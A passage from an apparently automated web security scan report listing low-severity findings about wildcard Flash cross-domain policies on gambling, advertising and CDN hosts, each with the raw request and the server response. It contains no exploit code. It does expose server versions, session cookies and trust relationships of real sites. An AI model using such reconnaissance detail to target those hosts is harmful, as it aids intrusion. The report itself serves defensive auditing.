Set-Cookie: ASP.NET_SessionId=pfap3l45eho50l2zq02tfmr1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.95. http://no.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://no.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: no.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:31 GMT
Accept-Ranges: bytes
ETag: "7a9026fb47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:30:36 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.96. http://no.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://no.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: no.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rwuc15iocbn0hh45vaf0jf45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.97. http://no.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://no.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: no.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=te3n2x34yqyh4a55ikncaw55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.98. http://optimized-by.rubiconproject.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:39:12 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.99. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 16 May 2011 11:12:37 GMT
Expires: Tue, 17 May 2011 11:12:37 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 5832
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.100. http://primescratchcards.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: primescratchcards.com

Response

HTTP/1.1 200 OK
Content-Length: 286
Content-Type: text/xml
Last-Modified: Thu, 31 Dec 2009 01:34:45 GMT
Accept-Ranges: bytes
ETag: "daca8c6eb989ca1:357c"
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:40:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.primescratchcards.com"/>
...[SNIP]...

4.101. http://pt.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pt.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ukzmxuj5jko3qk45she00efs; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.102. http://pt.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pt.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:40 GMT
Accept-Ranges: bytes
ETag: "3277a0048b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:30 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.103. http://pt.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pt.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:01:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5wfm3eyqdgnrq3eblixkkuqv; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.104. http://pt.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pt.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tigbgujcfcltnircglsds3vh; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.105. http://pt.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pt.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=khanudn1lscfxgjtuuy2l4q1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.106. http://pubads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 16 May 2011 03:47:50 GMT
Expires: Tue, 17 May 2011 03:47:50 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 32661
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.107. https://secure.neogames-tech.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 305
Content-Type: text/xml
Last-Modified: Wed, 04 Aug 2010 09:29:36 GMT
Accept-Ranges: bytes
ETag: "54fca8db733cb1:1396"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...

4.108. http://server.iad.liveperson.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:d1a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
Date: Mon, 16 May 2011 11:41:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.109. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Mon, 16 May 2011 12:49:44 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.110. http://sv.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://sv.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=me0scu552iqdw3nie0qmefj3; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.111. http://sv.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://sv.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:46 GMT
Accept-Ranges: bytes
ETag: "e6c238448b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:23 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.112. http://sv.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://sv.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cevewj45iuk45jzrit52fpvz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.113. http://sv.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://sv.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=44lp5f45g1dakvn4mpooxjv2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.114. http://sv.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://sv.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rozjyjqwnc4age55tgeyit45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
